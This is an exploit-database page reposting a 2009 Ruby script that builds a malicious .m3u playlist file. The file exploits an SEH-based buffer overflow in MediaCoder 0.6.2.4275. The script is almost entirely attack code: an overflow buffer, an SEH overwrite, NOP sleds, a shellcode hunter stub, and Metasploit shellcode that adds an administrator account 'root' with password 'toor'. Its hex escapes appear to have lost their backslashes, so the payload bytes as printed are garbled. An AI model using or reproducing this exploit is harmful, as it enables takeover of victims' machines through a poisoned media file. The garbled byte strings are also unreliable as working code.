MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)
# Published : 2009-03-09
# Author : Stack
# Previous Title : MediaCoder 0.6.2.4275 (m3u File) Universal Stack Overflow Exploit
# Next Title : Winamp <= 5.541 Skin Universal Buffer Overflow Exploit
#!/usr/bin/env ruby
# MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)
# Universal SEH Overwrite Exploit
# By Stack
# Mountassif Moad
# Download app : http://mediacoder.sourceforge.net/mirrors.htm?file=MediaCoder-0.6.2.4275.exe
# cat Greatz.txt
# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
files = gets.chomp.capitalize
puts "Name Of File : " + files +'.m3u'
time1 = Time.new
$VERBOSE=nil
Header = 
"x23x45x58x54x4Dx33x55x0Dx0Ax23x45x58x54x49x4Ex46"+
"x3Ax33x3Ax35x30x2Cx4Cx61x6Dx62x20x4Fx66x20x47x6F"+
"x64x20x2Dx20x53x65x74x20x54x6Fx20x46x61x69x6Cx20"+
"x0Dx0Ax44x3Ax5C"
# win32_adduser -  PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
Shellscode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"+
"x42x50x42x30x42x30x4bx38x45x54x4ex33x4bx38x4ex47"+
"x45x30x4ax57x41x50x4fx4ex4bx58x4fx54x4ax31x4bx48"+
"x4fx35x42x32x41x50x4bx4ex49x54x4bx58x46x53x4bx58"+
"x41x30x50x4ex41x43x42x4cx49x39x4ex4ax46x58x42x4c"+
"x46x57x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+
"x46x4fx4bx33x46x45x46x42x46x50x45x57x45x4ex4bx48"+
"x4fx55x46x42x41x30x4bx4ex48x56x4bx48x4ex50x4bx34"+
"x4bx48x4fx35x4ex31x41x30x4bx4ex4bx48x4ex41x4bx58"+
"x41x30x4bx4ex49x38x4ex45x46x52x46x30x43x4cx41x53"+
"x42x4cx46x36x4bx38x42x44x42x53x45x38x42x4cx4ax57"+
"x4ex50x4bx38x42x54x4ex50x4bx58x42x57x4ex41x4dx4a"+
"x4bx38x4ax56x4ax30x4bx4ex49x30x4bx48x42x58x42x4b"+
"x42x50x42x30x42x50x4bx48x4ax46x4ex43x4fx35x41x53"+
"x48x4fx42x46x48x55x49x48x4ax4fx43x48x42x4cx4bx37"+
"x42x55x4ax56x42x4fx4cx58x46x50x4fx45x4ax36x4ax39"+
"x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x46x4dx46"+
"x46x56x50x52x45x36x4ax47x45x46x42x52x4fx32x43x46"+
"x42x52x50x56x45x56x46x37x42x52x45x57x43x57x45x46"+
"x44x37x42x32x44x47x4fx46x4fx56x46x37x42x32x46x37"+
"x4fx36x4fx56x44x57x42x52x4fx42x41x44x46x54x46x34"+
"x42x52x48x52x48x52x42x32x50x56x45x36x46x37x42x52"+
"x4ex36x4fx46x43x56x41x56x4ex36x47x36x44x57x4fx36"+
"x45x57x42x47x42x52x41x34x46x46x4dx36x49x46x50x56"+
"x49x36x43x47x46x47x44x37x41x36x46x57x4fx56x44x57"+
"x43x47x42x32x44x57x4fx56x4fx46x46x47x42x32x4fx32"+
"x41x54x46x54x46x54x42x50x5a"
# Media_bruteforcer_shellcode
Bruteforce = # BruteForce the shellcode to runing if it dont work in the first methode
"xD0x62x43"+        #  SHL BYTE PTR DS:[EDX+43],1
"x00xB8x6D"+        #  ADD BYTE PTR DS:[EAX+1ABBB6D],BH
"xBBxABx01"+
"x00x00"+            #  ADD BYTE PTR DS:[EAX],AL
"x00xF0"+            #  ADD AL,DH
"xFFx13"+            #  CALL DWORD PTR DS:[EBX]
"x00x4Fx6D"+        #  ADD BYTE PTR DS:[EDI+6D],CL
"x81x7Cx38x07"+    #  CMP DWORD PTR DS:[EAX+EDI+7],FFFF7C92
"x92x7CxFF"+
"xFFxFF" + Shellscode
Rhunter =
"x5B"+             #POP EBX
"x90" * 10 +       # NOP x 10  
"x90x90"+         # NOP NOP
"x8Dx44xC1x04"+ # LEA EAX,DWORD PTR DS:[ECX+EAX*8+4]
"x8Bx1E"+         # MOV EBX,DWORD PTR DS:[ESI]
"x89x18"+         # MOV DWORD PTR DS:[EAX],EBX
"x89x06"+         # MOV DWORD PTR DS:[ESI],EAX
"x42"+             # INC EDX
"x83xFAx64"+     # CMP EDX,64
"x75xEC"+         # JNZ SHORT dsp_chmx.0169127E
"x8Bx06"+         # MOV EAX,DWORD PTR DS:[ESI]
"x8Bx10"+         # MOV EDX,DWORD PTR DS:[EAX]
"x89x16"+         # MOV DWORD PTR DS:[ESI],EDX
"x5E"+             # POP ESI
"x5B"+             # POP EBX
"x93x43"+         # CALL ESP
"x92x7c"
Over     = "x41" * 195 + "xffxffxffxff" + "x47" * 4 + "x42" * 6 + "xffxffx47x47x47xFFx65x78x77x76"
Nop      = "x90" * 8
Next_Seh = "xebx06xffxff"
Seh      = "x93xB6x98x7C" 
Nopsled  = "x90" * 7
Xpl = Header + Over + Rhunter + Nop + Shellscode + Nopsled + Next_Seh + Seh + Nop + Bruteforce + Nopsled
File.open( files+".m3u", "w" ) do |the_file|
the_file.puts(Xpl)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + files +".m3u :d"
end

# www.Syue.com [2009-03-09]